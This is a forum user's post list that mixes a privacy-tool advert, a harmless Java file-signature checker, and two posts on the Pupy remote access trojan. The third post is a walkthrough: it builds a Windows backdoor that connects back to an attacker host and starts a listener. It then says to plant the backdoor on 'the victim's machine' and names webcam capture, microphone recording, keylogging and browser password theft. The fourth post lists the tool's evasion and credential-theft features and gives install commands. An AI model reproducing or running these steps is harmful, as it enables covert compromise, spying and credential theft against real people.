Posts posted by qps1

  1. Features:

    Anti-RunPE

    Anti-webcam

    Anti-keylogger

    Anti-screenshot

    Anti-extension spoofing

    Effective network monitor

    Full drive and MFT eraser

    System recycle bin cleaner

    Anonym live online panel

    Real-time packer information

    Secure file and folder shredder

    Block unwanted or all USB volumes

    Unlock blocked/ used files with ease

     

    System requirements:

    Windows Vista or newer

    .Net Framework 4

    Windows Aero enabled

    1GB Ram

    Dual core CPU

    Up to six webcams

    Up to six monitors

     

     

    Download

    License: HFL

     

     

    • Upvote 1
  2. Checks file signatures (magic numbers).

    package org.malc0de.corejava;
     
    import java.io.File;
    import java.io.FileInputStream;
    import java.io.IOException;
    import java.util.Arrays;
     
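    /**
     * Checks whether a file starts with an expected signature (magic number).
     */
    public class MagicNumberChecker {

        /**
         * Default Constructor
         */
        public MagicNumberChecker() {
        }

        /**
         * Compares the leading bytes of the file, one at a time, with the
         * expected signature given as unsigned byte values (0x00-0xff).
         */
        public boolean verifyFileHeader(File file, int[] magicNumber) {
            try(FileInputStream fis = new FileInputStream(file)) {
                for (int i : magicNumber) {
                    // read() returns -1 at end of file, so a short file fails here
                    if (fis.read() != i) {
                        return false;
                    }
                }
                return true;
            } catch (IOException e) {
                e.printStackTrace();
            }
            // An unreadable file must not be reported as a match
            return false;
        }

        /**
         * Same check with the signature given as a byte array.
         */
        public boolean verifyFileHeader(File file, byte[] magicNumber) {
            try(FileInputStream fis = new FileInputStream(file)) {
                byte[] buffer = new byte[magicNumber.length];
                int off = 0;
                // read() may return fewer bytes than requested; fill the whole buffer
                while (off < buffer.length) {
                    int n = fis.read(buffer, off, buffer.length - off);
                    if (n == -1) {
                        return false; // file is shorter than the signature
                    }
                    off += n;
                }
                return Arrays.equals(magicNumber, buffer);
            } catch (IOException e) {
                e.printStackTrace();
            }
            return false;
        }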
     
        public static void main(String... strings) {
     
            final int[] SQLITE3_MAGIC_HEADER = {
                    0x53, 0x51, 0x4c, 0x69, 0x74, 0x65, 0x20, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74,
                    0x20, 0x33, 0x00
            };
     
            final byte[] SQLITE3_MAGIC_HEADER2 = {
                    (byte) 0x53, (byte) 0x51, (byte) 0x4c, (byte) 0x69, (byte) 0x74, (byte) 0x65,
                    (byte) 0x20, (byte) 0x66, (byte) 0x6f, (byte) 0x72, (byte) 0x6d, (byte) 0x61,
                    (byte) 0x74, (byte) 0x20, (byte) 0x33, (byte) 0x00
            };
     
            MagicNumberChecker mnc = new MagicNumberChecker();
     
            File file = new File(mnc.getClass().getResource("resources/test.db").getFile());
     
            if (mnc.verifyFileHeader(file, SQLITE3_MAGIC_HEADER)) {
                System.out.println("Valid Sqlite3 Database!");
            } else {
                System.out.println("Invalid Sqlite3 Database!");
            }
     
            if (mnc.verifyFileHeader(file, SQLITE3_MAGIC_HEADER2)) {
                System.out.println("Valid Sqlite3 Database!");
            } else {
                System.out.println("Invalid Sqlite3 Database!");
            }
        }
    }
     

     

  3. Let's begin

    1. The first step is to open your terminal and then cd into the pupy directory where you put it, and then enter as root

    Code:  cd /c/tools/rat/pupy/pupy/ 

    2. Now, let's create a simple Windows x86 backdoor. Execute this command:

    Code:  ./pupygen.py -f exe_x86 -o backdoor.exe connect --host 10.42.0.1:9999 -t tcp_cleartext

     

    The output will be like this:

    8XLPRWr.png

     

    If you're getting the output just like mine, it means you're on the right path, ready to rock and roll 

    3. Pupy has its own listener called 'pupy shell', so let's start our listener. Run this command:

    Code: ./pupysh.py -p 9999 -t tcp_cleartext

    * -p is the port that pupy shell will listen on
    * -t is the transport layer that we wanna use; be sure to use the right transport, it should be the same as the backdoor we generated before

     

    The output will be like this:

    9dfU6pH.png

     

    4. Now your job is to put the backdoor on the victim's machine and then execute it

    5. Wait until you get a session like this
    J1FSXd3.png

    6. Do whatever you want; you can see the available modules with the list_modules command

    4ULVK9c.png


    If you wanna run a module, you just have to type 'run category/module'
    An example running a troll message box module:


    Code: >>> run troll/msgbox --title error "pwned by pupy"

    You can also take a snapshot from the victim's webcam, record the microphone, scan keystrokes, dump passwords from browsers and much more, as this project is growing.
    You can also generate a backdoor to connect to your VPS or your DDNS!

  4. Pupy
    Pupy is an open-source, multi-platform (Windows, Linux, OSX, Android) RAT (remote administration tool) and post-exploitation tool. It is written mainly in Python.
    Pupy modules can transparently access remote Python objects using rpyc to perform various interactive tasks.
    Pupy can generate payloads in multiple formats, such as PE executables, DLLs, pure Python files, PowerShell, apk, ...
     - Choose a launcher (connect, bind, ...), a transport (ssl, http, rsa, obfs3, scramblesuit, ...) and a number of "scriptlets". Scriptlets are scripts meant to be embedded to perform various tasks offline (without requiring a session), such as adding persistence, starting a keylogger, or detecting a sandbox.

    Features
    - On Windows, Pupy is compiled as a DLL and is loaded into memory.
    - It can reflectively migrate into other processes.
    - It can remotely import, from memory, pure Python packages (.py, .pyc) and Python C packages (.pyd).
    - Pupy is easily extensible; it uses [rpyc].
    - Pupy can also communicate using obfsproxy. All non-interactive modules can be dispatched to multiple hosts in a single command.
    - Multi-platform (tested on Windows 7, 8, 10, Kali Linux, Ubuntu, OSX, Android)
    - Available in multiple formats: exe (x86, x64), dll (x86, x64), Python, apk, ...

    Transport
     - rsa
     - A layer with authentication and encryption using RSA and AES256, often with other layers stacked on top.
     - A layer using a static AES256 key
     - ssl (default)
     - http
     - obfs3 - with the help of the rsa layer for better security.
     - etc.

    Windows Specific
     - migrate
     - works very well with [mimikatz]
     - screenshot
     - microphone recording
     - keylogger
     - keyboard recording
     - screenshots on every click
     - etc.
     

    Screenshots
    https://github.com/n1nj4sec/pupy/wiki/Screenshots

     

    Install

     

    git clone https://github.com/n1nj4sec/pupy.git pupy
    cd pupy
    git submodule update --init --depth 1 pupy/payload_templates
    git submodule init
    git submodule update
    pip install -r requirements.txt

     

    • Upvote 8